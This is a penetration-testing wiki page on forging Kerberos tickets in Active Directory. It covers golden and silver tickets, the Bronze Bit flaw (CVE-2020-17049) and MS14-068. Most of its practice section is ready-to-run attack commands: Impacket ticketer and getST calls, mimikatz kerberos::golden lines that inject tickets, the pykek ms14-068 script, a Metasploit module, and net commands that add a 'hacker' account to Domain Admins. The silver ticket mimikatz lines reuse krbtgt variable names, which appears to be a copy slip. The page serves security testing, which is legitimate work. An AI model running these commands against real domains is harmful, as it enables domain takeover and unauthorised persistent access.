Forged tickets

MITRE ATT&CK™ Sub-techniques T1558.001 and T1558.002
Theory
Silver and golden tickets are forged Kerberos tickets that can be used with pass-the-ticket to access services in an Active Directory domain.
Golden ticket: The NT hash (or AES key) of the special account krbtgt can be used to forge a special TGT (Ticket Granting Ticket) that can later be used with Pass-the-ticket to access any resource within the AD domain.
Silver ticket: The NT hash (or AES key) of a service account can be used to forge a Service ticket that can later be used with Pass-the-ticket to access that service
The Bronze bit vulnerability (CVE-2020-17049) introduced the possibility of forwarding service tickets when it shouldn't normally be possible (protected users, unconstrained delegation, constrained delegation configured with protocol transition).
🛠️ //TODO : MS14-068
Practice
The following parts allow to obtain modified or crafted Kerberos tickets. Once obtained, these tickets can be used with Pass-the-Ticket.
Golden ticket
In order to craft a golden ticket, testers need to find the krbtgt's NT hash or AES key (128 or 256 bits). In most cases, this can only be achieved with domain admin privileges through a DCSync attack. Because of this, golden tickets only allow lateral movement and not privilege escalation.
Microsoft now uses AES 256 bits by default. Using this encryption algorithm (instead of giving the NThash) will be stealthier.
UNIX-like
Windows
UNIX-like
There are Impacket scripts for each step of a golden ticket creation : retrieving the krbtgt, retrieving the domain SID, creating the golden ticket.
# Find the domain SID
lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/DomainUser@DomainController' 0
​
# Create the golden ticket (with an NT hash)
ticketer.py -nthash $krbtgtNThash -domain-sid $domainSID -domain $DOMAIN randomuser
​
# Create the golden ticket (with an AES 128/256bits key)
ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN randomuser
Windows
On Windows, mimikatz (C) can be used for this attack.
# with an NT hash
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$krbtgt_NThash /user:randomuser /ptt
​
# with an AES 128 key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$krbtgt_aes128_key /user:randomuser /ptt
​
# with an AES 256 key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$krbtgt_aes256_key /user:randomuser /ptt
For both mimikatz and Rubeus, the /ptt flag is used to automatically inject the ticket.
Silver ticket
In order to craft a silver ticket, testers need to find the target service account's NT hash or AES key (128 or 256 bits).
"While the scope is more limited than Golden Tickets, the required hash is easier to get and there is no communication with a DC when using them, so detection is more difficult than Golden Tickets." (adsecurity.org)
UNIX-like
Windows
UNIX-like
The Impacket script ticketer can create silver tickets.
# Find the domain SID
lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/DomainUser@DomainController' 0
​
# with an NT hash
python ticketer.py -nthash $NThash -domain-sid $DomainSID -domain $DOMAIN -spn $SPN $Username
​
# with an AES (128 or 256 bits) key
python ticketer.py -aesKey $AESkey -domain-sid $DomainSID -domain $DOMAIN -spn $SPN $Username
The SPN (ServicePrincipalName) set will have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain will allow most remote dumping operations (more info on adsecurity.org).
Windows
On Windows, mimikatz can be used to generate a silver ticket. Testers need to carefully choose the right SPN type (cifs, http, ldap, host, rpcss) depending on the wanted usage.
# with an NT hash
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$krbtgt_NThash /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt
​
# with an AES 128 key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$krbtgt_aes128_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt
​
# with an AES 256 key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$krbtgt_aes256_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt
For both mimikatz and Rubeus, the /ptt flag is used to automatically inject the ticket.
Bronze bit (CVE-2020-17049)
In order to exploit this vulnerability, attackers need to find a service able to delegate to another service (see Kerberos delegations), and they need that first service account NT hash or AES key (128 or 256 bits).
For example with constrained delegation set between a controlled service and a target one with protocol transition enabled and the target user being protected, the Impacket script getST (Python) can perform all the necessary steps to obtain the final "impersonating" TGS (in this case, "Administrator" is impersonated/delegated account but it can be any user in the environment).
The input credentials are those of the compromised service account configured with constrained delegations.
# with an NT hash
getST.py -force-forwardable -spn $Target_SPN -impersonate Administrator -dc-ip $Domain_controller -hashes :$Controlled_service_NThash $Domain/$Controlled_service_account
​
# with an AES (128 or 256 bits) key
getST.py -force-forwardable -spn $Target_SPN -impersonate Administrator -dc-ip $Domain_controller -aesKey $Controlled_service_AES_key $Domain/$Controlled_service_account
The SPN (ServicePrincipalName) set will have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain will allow most remote dumping operations (more info on adsecurity.org).
MS14-068 (CVE-2014-6324)
This vulnerability allows attackers to forge a TGT with unlimited power (i.e. with a modified PAC stating the user is a member of privileged groups). This attack is similar to the golden ticket, however, it doesn't require the attacker to know the krbtgt. This attack is a really powerful privilege escalation technique. However, it will not work on patched domain controllers.
pykek
metasploit
pykek
This attack can be operated with pykek's ms14-068 Python script. The script can carry out the attack with a cleartext password or with pass-the-hash.
# with a plaintext password
ms14-068.py -u 'USER'@'DOMAIN_FQDN' -p 'PASSWORD' -s 'USER_SID' -d 'DOMAIN_CONTROLLER'
​
# with pass-the-hash
ms14-068.py -u 'USER'@'DOMAIN_FQDN' --rc4 'NThash' -s 'USER_SID' -d 'DOMAIN_CONTROLLER'
If the attack is successful, the script will write a .ccache ticket that will be usable with pass-the-ticket.
metasploit
Using the Metasploit Framework can sometimes be more useful since it prints valuable error information.
msf6 > use admin/kerberos/ms14_068_kerberos_checksum
In some scenarios, I personally have had trouble using the .ccache ticket on UNIX-like systems. What I did was convert it to .kirbi, switch to a Windows system, inject the ticket with mimikatz's kerberos:ptt command, and then create a new user and add it to the domain admins group.
net user "hacker" "132Pentest!!!" /domain /add
net group "Domain Admins" /domain /add
References
Silver & Golden Tickets
This post focuses on silver ticket and golden ticket. What are they, how are they used, what can be done with them, we will uncover everything there is to know.
en.hackndo.com
How Attackers Use Kerberos Silver Tickets to Exploit Systems
Usually Golden Tickets (forged Kerberos TGTs) get all the press, but this post is about Silver Tickets and how attackers use them to exploit systems. I have talked about how Silver Tickets can be used to persist and even re-exploit an Active Directory enterprise in presentations at security conferences this year. This post continues this ...
adsecurity.org
Kerberos & KRBTGT: Active Directory’s Domain Kerberos Service Account
Every Domain Controller in an Active Directory domain runs a KDC (Kerberos Distribution Center) service which handles all Kerberos ticket requests. AD uses the KRBTGT account in the AD domain for Kerberos tickets. The KRBTGT account is one that has been lurking in your Active Directory environment since it was first stood up. Each Active ...
adsecurity.org
Kerberos in Active Directory
Kerberos is a protocol that allows users to authenticate on the network, and access services once authenticated. This post explains how it works.
en.hackndo.com
CVE-2020-17049: Kerberos Bronze Bit Attack - Overview
This post is an overview of the Bronze Bit attack (CVE-2020-17049) against Kerberos implementations in Windows Active Directory.
blog.netspi.com
Digging into MS14-068, Exploitation and Defence
labs.f-secure.com
​
Overpass the hash
Pass the ticket
Last updated 2 months ago